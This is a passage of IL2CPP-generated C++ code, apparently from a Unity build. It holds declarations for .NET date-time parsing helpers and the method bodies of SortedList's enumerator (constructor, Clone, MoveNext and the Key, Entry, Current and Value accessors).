(__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Void System.Globalization.HebrewNumberParsingContext::.ctor(System.Int32) extern "C" IL2CPP_METHOD_ATTR void HebrewNumberParsingContext__ctor_m8053C4350B4A4501DA238B4F8B345E2B5FC38128 (HebrewNumberParsingContext_t73104EEB061AFC678110026DD0277C48EAC49B0A * __this, int32_t ___result0, const RuntimeMethod* method); // System.Globalization.HebrewNumberParsingState System.Globalization.HebrewNumber::ParseByChar(System.Char,System.Globalization.HebrewNumberParsingContext&) extern "C" IL2CPP_METHOD_ATTR int32_t HebrewNumber_ParseByChar_m083C7C0CF554FDF381FEDB6DE92308BBD82B222D (Il2CppChar ___ch0, HebrewNumberParsingContext_t73104EEB061AFC678110026DD0277C48EAC49B0A * ___context1, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ParseDigits(System.__DTString&,System.Int32,System.Int32,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseDigits_mC3189AD7B9779F87FA8AB834C58B26B111170110 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, int32_t ___minDigitLen1, int32_t ___maxDigitLen2, int32_t* ___result3, const RuntimeMethod* method); // System.Boolean System.__DTString::GetNextDigit() extern "C" IL2CPP_METHOD_ATTR bool __DTString_GetNextDigit_mE662D3828A0E0648E24F62FC5D750DA554364EFB (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Int32 System.__DTString::GetDigit() extern "C" IL2CPP_METHOD_ATTR int32_t __DTString_GetDigit_m0A4FC9D7AA54648B77398FAF7997FF7FED3694BF (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ParseSign(System.__DTString&,System.Boolean&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseSign_m201C9E47259088522A1BF0869FD06E26FCDE24F1 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, bool* ___result1, const RuntimeMethod* method); // System.Boolean System.__DTString::Match(System.String) extern "C" IL2CPP_METHOD_ATTR bool __DTString_Match_m6E1CE300661D15D140D2FAC5C54E74BDBE70EE19 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, String_t* ___str0, const RuntimeMethod* method); // System.Boolean System.Globalization.DateTimeFormatInfo::get_HasSpacesInMonthNames() extern "C" IL2CPP_METHOD_ATTR bool DateTimeFormatInfo_get_HasSpacesInMonthNames_mAAB2BD50D0EA1824848EA8B0047ADF82E02AB7B9 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.Boolean System.__DTString::MatchSpecifiedWord(System.String) extern "C" IL2CPP_METHOD_ATTR bool __DTString_MatchSpecifiedWord_m6B53744885B818B053CFE143A6AD0F778D617410 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, String_t* ___target0, const RuntimeMethod* method); // System.Boolean System.__DTString::MatchSpecifiedWords(System.String,System.Boolean,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool __DTString_MatchSpecifiedWords_mAD172D28B54FDBB34D5E8C8F92CB6C8B0EECDBA0 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, String_t* ___target0, bool ___checkWordBoundary1, int32_t* ___matchLength2, const RuntimeMethod* method); // System.String[] System.Globalization.DateTimeFormatInfo::internalGetLeapYearMonthNames() extern "C" IL2CPP_METHOD_ATTR StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* DateTimeFormatInfo_internalGetLeapYearMonthNames_m2C9F72E749A85E6842B45DE3146D0CDDCBB58C92 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.Int32 System.__DTString::MatchLongestWords(System.String[],System.Int32&) extern "C" IL2CPP_METHOD_ATTR int32_t __DTString_MatchLongestWords_mCEDB8993665810AAB06045D6EFF076B89572C4BF (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___words0, int32_t* ___maxMatchStrLen1, const RuntimeMethod* method); // System.String[] System.Globalization.DateTimeFormatInfo::get_MonthGenitiveNames() extern "C" IL2CPP_METHOD_ATTR StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* DateTimeFormatInfo_get_MonthGenitiveNames_m249A57C68A09D5EE6771DCB4A0D5D1EE9CEE78E4 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.Boolean System.Globalization.DateTimeFormatInfo::get_HasSpacesInDayNames() extern "C" IL2CPP_METHOD_ATTR bool DateTimeFormatInfo_get_HasSpacesInDayNames_mE48415D8A2AD4A3C4B1008743D7646244C51D601 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::GetAbbreviatedEraName(System.Int32) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_GetAbbreviatedEraName_m8096A35954A22E28951B8DDDB1BE4B1CD831D7C4 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, int32_t ___era0, const RuntimeMethod* method); // System.Int32 System.__DTString::GetRepeatCount() extern "C" IL2CPP_METHOD_ATTR int32_t __DTString_GetRepeatCount_m115C785C62A5A67CE2BCEA6789CA89BA5B0A97B5 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Boolean System.DateTimeParse/MatchNumberDelegate::Invoke(System.__DTString&,System.Int32,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool MatchNumberDelegate_Invoke_mD58C3725D11C533D85FA5D0F3C7CA924F3897CEF (MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * __this, __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, int32_t ___digitLen1, int32_t* ___result2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::CheckNewValue(System.Int32&,System.Int32,System.Char,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988 (int32_t* ___currentValue0, int32_t ___newValue1, Il2CppChar ___patternChar2, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result3, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::MatchAbbreviatedMonthName(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchAbbreviatedMonthName_m347D9553C124F81EBCD0A0568F36463A02189A15 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::MatchMonthName(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchMonthName_mB1C51508CD0064B05AA17E5C6468ADDBD222656D (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::MatchAbbreviatedDayName(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchAbbreviatedDayName_m618C84891A479DEDF2B78D5CD7A8691C72A2FB0B (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::MatchDayName(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchDayName_mD95E4FCC4500803D388819713034C5B32EEEB40B (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::MatchEraName(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchEraName_mF26765E6FE328C642E3F4BE8012D2B432F607E27 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ParseFractionExact(System.__DTString&,System.Int32,System.Double&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseFractionExact_m476F7F83C40650B7BCA5511D184B1CBA207A95AB (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, int32_t ___maxDigitLen1, double* ___result2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::MatchAbbreviatedTimeMark(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.DateTimeParse/TM&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchAbbreviatedTimeMark_m2839DE1FBBEA99B46C8B84199D361D30AF7294C4 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::MatchTimeMark(System.__DTString&,System.Globalization.DateTimeFormatInfo,System.DateTimeParse/TM&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_MatchTimeMark_m410D39EB9A0FFAAFD4119D320FE683170625395C (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___result2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ParseTimeZoneOffset(System.__DTString&,System.Int32,System.TimeSpan&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseTimeZoneOffset_mA4E0AC9488ACC70C3CD71335F183CE5F9CB86D28 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, int32_t ___len1, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * ___result2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetTimeZoneName(System.__DTString&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetTimeZoneName_m97D930C9A69DF1FF85F761CEBB5025A04360FEAD (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::TryParseQuoteString(System.String,System.Int32,System.Text.StringBuilder,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_TryParseQuoteString_m4330D0C32F5AFEE3E7F1DC53584C2247DCF5CBAC (String_t* ___format0, int32_t ___pos1, StringBuilder_t * ___result2, int32_t* ___returnValue3, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ParseByFormat(System.__DTString&,System.__DTString&,System.ParsingInfo&,System.Globalization.DateTimeFormatInfo,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseByFormat_mA0F5500F7D2A3FF7BD1862671B4A12A0E9F66E30 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___format1, ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * ___parseInfo2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result4, const RuntimeMethod* method); // System.Void System.ParsingInfo::Init() extern "C" IL2CPP_METHOD_ATTR void ParsingInfo_Init_mCA35EA147545DA7A3AAEA2087D1F4E317353339A (ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * __this, const RuntimeMethod* method); // System.String System.DateTimeParse::ExpandPredefinedFormat(System.String,System.Globalization.DateTimeFormatInfo&,System.ParsingInfo&,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeParse_ExpandPredefinedFormat_m87CF9E69CC8E52C3D20A55D52FD3DFBBAAC1A44F (String_t* ___format0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** ___dtfi1, ParsingInfo_t7E92EB1D56110F024979E1E497A675BC596BA7B7 * ___parseInfo2, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result3, const RuntimeMethod* method); // System.Void System.__DTString::.ctor(System.String,System.Globalization.DateTimeFormatInfo,System.Boolean) extern "C" IL2CPP_METHOD_ATTR void __DTString__ctor_m9E9D21ACAC80CD2A8935D885767A9D7320A78FCF (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, String_t* ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, bool ___checkDigitToken2, const RuntimeMethod* method); // System.Void System.__DTString::TrimTail() extern "C" IL2CPP_METHOD_ATTR void __DTString_TrimTail_m23E23486D88B86A755B551A9881F1FDA9D6DD99A (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Void System.__DTString::RemoveTrailingInQuoteSpaces() extern "C" IL2CPP_METHOD_ATTR void __DTString_RemoveTrailingInQuoteSpaces_m18A5B81964E3027BF02B1393CCD7781AB3ECA72F (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Void System.__DTString::RemoveLeadingInQuoteSpaces() extern "C" IL2CPP_METHOD_ATTR void __DTString_RemoveLeadingInQuoteSpaces_m71E36820EEC9E50FFC1FA2F53FCFA3495EB2BC19 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Boolean System.Globalization.DateTimeFormatInfo::get_HasYearMonthAdjustment() extern "C" IL2CPP_METHOD_ATTR bool DateTimeFormatInfo_get_HasYearMonthAdjustment_m638241B02A89164978FE5DF2BB3E1FD1C3DC7BCD (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, const RuntimeMethod* method); // System.Void System.ArgumentNullException::.ctor(System.String,System.String) extern "C" IL2CPP_METHOD_ATTR void ArgumentNullException__ctor_m9EA692D49986AEBAC433CE3381331146109AE20F (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * __this, String_t* ___paramName0, String_t* ___message1, const RuntimeMethod* method); // System.Void System.DateTimeParse/MatchNumberDelegate::.ctor(System.Object,System.IntPtr) extern "C" IL2CPP_METHOD_ATTR void MatchNumberDelegate__ctor_m9E0CFF7DE8D941AD5D703F3F76E387EF5E5E4DC2 (MatchNumberDelegate_t15412AE1CF0D1909CB05C7DBB8079E9281CCA05D * __this, RuntimeObject * ___object0, intptr_t ___method1, const RuntimeMethod* method); #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif #ifdef __clang__ #pragma clang diagnostic pop #endif #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Void System.Collections.SortedList/SortedListEnumerator::.ctor(System.Collections.SortedList,System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR void SortedListEnumerator__ctor_m91F6FB1020A030036AE45501806206DE3695568B (SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E * __this, SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * ___sortedList0, int32_t ___index1, int32_t ___count2, int32_t ___getObjRetType3, const RuntimeMethod* method) { { Object__ctor_m925ECA5E85CA100E3FB86A4F9E15C120E9A184C0(__this, /*hidden argument*/NULL); SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * L_0 = ___sortedList0; __this->set_sortedList_0(L_0); int32_t L_1 = ___index1; __this->set_index_3(L_1); int32_t L_2 = ___index1; __this->set_startIndex_4(L_2); int32_t L_3 = ___index1; int32_t L_4 = ___count2; __this->set_endIndex_5(((int32_t)il2cpp_codegen_add((int32_t)L_3, (int32_t)L_4))); SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * L_5 = ___sortedList0; int32_t L_6 = L_5->get_version_3(); __this->set_version_6(L_6); int32_t L_7 = ___getObjRetType3; __this->set_getObjectRetType_8(L_7); __this->set_current_7((bool)0); return; } } // System.Object System.Collections.SortedList/SortedListEnumerator::Clone() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * SortedListEnumerator_Clone_mCDD985F3FA021A7105B1690CE22EE0B38FEDCC99 (SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E * __this, const RuntimeMethod* method) { { RuntimeObject * L_0 = Object_MemberwiseClone_m1DAC4538CD68D4CF4DC5B04E4BBE86D470948B28(__this, /*hidden argument*/NULL); return L_0; } } // System.Object System.Collections.SortedList/SortedListEnumerator::get_Key() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * SortedListEnumerator_get_Key_mDE6E5D038A0212BB14DCBB9D73F831233EAC826E (SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (SortedListEnumerator_get_Key_mDE6E5D038A0212BB14DCBB9D73F831233EAC826E_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = __this->get_version_6(); SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * L_1 = __this->get_sortedList_0(); int32_t L_2 = L_1->get_version_3(); if ((((int32_t)L_0) == ((int32_t)L_2))) { goto IL_0023; } } { String_t* L_3 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFAD66767010E09AA6ADD07FA89C43A7F43F44049, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_4 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, SortedListEnumerator_get_Key_mDE6E5D038A0212BB14DCBB9D73F831233EAC826E_RuntimeMethod_var); } IL_0023: { bool L_5 = __this->get_current_7(); if (L_5) { goto IL_003b; } } { String_t* L_6 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral4B7A2452FBAAF02487F5667BCA2E7D64B9707EDC, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_7 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_7, L_6, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_7, NULL, SortedListEnumerator_get_Key_mDE6E5D038A0212BB14DCBB9D73F831233EAC826E_RuntimeMethod_var); } IL_003b: { RuntimeObject * L_8 = __this->get_key_1(); return L_8; } } // System.Boolean System.Collections.SortedList/SortedListEnumerator::MoveNext() extern "C" IL2CPP_METHOD_ATTR bool SortedListEnumerator_MoveNext_m9E4024F4C87D1FE851B86685062E1EB389D56266 (SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (SortedListEnumerator_MoveNext_m9E4024F4C87D1FE851B86685062E1EB389D56266_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = __this->get_version_6(); SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * L_1 = __this->get_sortedList_0(); int32_t L_2 = L_1->get_version_3(); if ((((int32_t)L_0) == ((int32_t)L_2))) { goto IL_0023; } } { String_t* L_3 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFAD66767010E09AA6ADD07FA89C43A7F43F44049, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_4 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, SortedListEnumerator_MoveNext_m9E4024F4C87D1FE851B86685062E1EB389D56266_RuntimeMethod_var); } IL_0023: { int32_t L_5 = __this->get_index_3(); int32_t L_6 = __this->get_endIndex_5(); if ((((int32_t)L_5) >= ((int32_t)L_6))) { goto IL_0078; } } { SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * L_7 = __this->get_sortedList_0(); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_8 = L_7->get_keys_0(); int32_t L_9 = __this->get_index_3(); int32_t L_10 = L_9; RuntimeObject * L_11 = (L_8)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_10)); __this->set_key_1(L_11); SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * L_12 = __this->get_sortedList_0(); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_13 = L_12->get_values_1(); int32_t L_14 = __this->get_index_3(); int32_t L_15 = L_14; RuntimeObject * L_16 = (L_13)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_15)); __this->set_value_2(L_16); int32_t L_17 = __this->get_index_3(); __this->set_index_3(((int32_t)il2cpp_codegen_add((int32_t)L_17, (int32_t)1))); __this->set_current_7((bool)1); return (bool)1; } IL_0078: { __this->set_key_1(NULL); __this->set_value_2(NULL); __this->set_current_7((bool)0); return (bool)0; } } // System.Collections.DictionaryEntry System.Collections.SortedList/SortedListEnumerator::get_Entry() extern "C" IL2CPP_METHOD_ATTR DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4 SortedListEnumerator_get_Entry_mEDCBB15F075D7D79709D37B9EB395F39252C253E (SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (SortedListEnumerator_get_Entry_mEDCBB15F075D7D79709D37B9EB395F39252C253E_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = __this->get_version_6(); SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * L_1 = __this->get_sortedList_0(); int32_t L_2 = L_1->get_version_3(); if ((((int32_t)L_0) == ((int32_t)L_2))) { goto IL_0023; } } { String_t* L_3 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralFAD66767010E09AA6ADD07FA89C43A7F43F44049, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_4 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, SortedListEnumerator_get_Entry_mEDCBB15F075D7D79709D37B9EB395F39252C253E_RuntimeMethod_var); } IL_0023: { bool L_5 = __this->get_current_7(); if (L_5) { goto IL_003b; } } { String_t* L_6 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral4B7A2452FBAAF02487F5667BCA2E7D64B9707EDC, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_7 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_7, L_6, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_7, NULL, SortedListEnumerator_get_Entry_mEDCBB15F075D7D79709D37B9EB395F39252C253E_RuntimeMethod_var); } IL_003b: { RuntimeObject * L_8 = __this->get_key_1(); RuntimeObject * L_9 = __this->get_value_2(); DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4 L_10; memset(&L_10, 0, sizeof(L_10)); DictionaryEntry__ctor_m67BC38CD2B85F134F3EB2473270CDD3933F7CD9B((&L_10), L_8, L_9, /*hidden argument*/NULL); return L_10; } } // System.Object System.Collections.SortedList/SortedListEnumerator::get_Current() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * SortedListEnumerator_get_Current_mD1C66071084DE980DC97EABCE7BFBCCF96066120 (SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (SortedListEnumerator_get_Current_mD1C66071084DE980DC97EABCE7BFBCCF96066120_MetadataUsageId); s_Il2CppMethodInitialized = true; } { bool L_0 = __this->get_current_7(); if (L_0) { goto IL_0018; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral4B7A2452FBAAF02487F5667BCA2E7D64B9707EDC, /*hidden argument*/NULL); InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 * L_2 = (InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1 *)il2cpp_codegen_object_new(InvalidOperationException_t0530E734D823F78310CAFAFA424CA5164D93A1F1_il2cpp_TypeInfo_var); InvalidOperationException__ctor_m72027D5F1D513C25C05137E203EEED8FD8297706(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, SortedListEnumerator_get_Current_mD1C66071084DE980DC97EABCE7BFBCCF96066120_RuntimeMethod_var); } IL_0018: { int32_t L_3 = __this->get_getObjectRetType_8(); if ((!(((uint32_t)L_3) == ((uint32_t)1)))) { goto IL_0028; } } { RuntimeObject * L_4 = __this->get_key_1(); return L_4; } IL_0028: { int32_t L_5 = __this->get_getObjectRetType_8(); if ((!(((uint32_t)L_5) == ((uint32_t)2)))) { goto IL_0038; } } { RuntimeObject * L_6 = __this->get_value_2(); return L_6; } IL_0038: { RuntimeObject * L_7 = __this->get_key_1(); RuntimeObject * L_8 = __this->get_value_2(); DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4 L_9; memset(&L_9, 0, sizeof(L_9)); DictionaryEntry__ctor_m67BC38CD2B85F134F3EB2473270CDD3933F7CD9B((&L_9), L_7, L_8, /*hidden argument*/NULL); DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4 L_10 = L_9; RuntimeObject * L_11 = Box(DictionaryEntry_tB5348A26B94274FCC1DD77185BD5946E283B11A4_il2cpp_TypeInfo_var, &L_10); return L_11; } } // System.Object System.Collections.SortedList/SortedListEnumerator::get_Value() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * SortedListEnumerator_get_Value_mA1FF92895EE42234163A72D61DA3D6CF6C642C14 (SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E * __this, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (SortedListEnumerator_get_Value_mA1FF92895EE42234163A72D61DA3D6CF6C642C14_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = __this->get_version_6(); SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * L_1 = __this->get_sortedList_0(); int32_t L_2 = L_1->get_version_3(); if ((((int32_t)L_0) == ((int32_t)L_2))) { goto IL_0023; } } { String_t* L_3 = 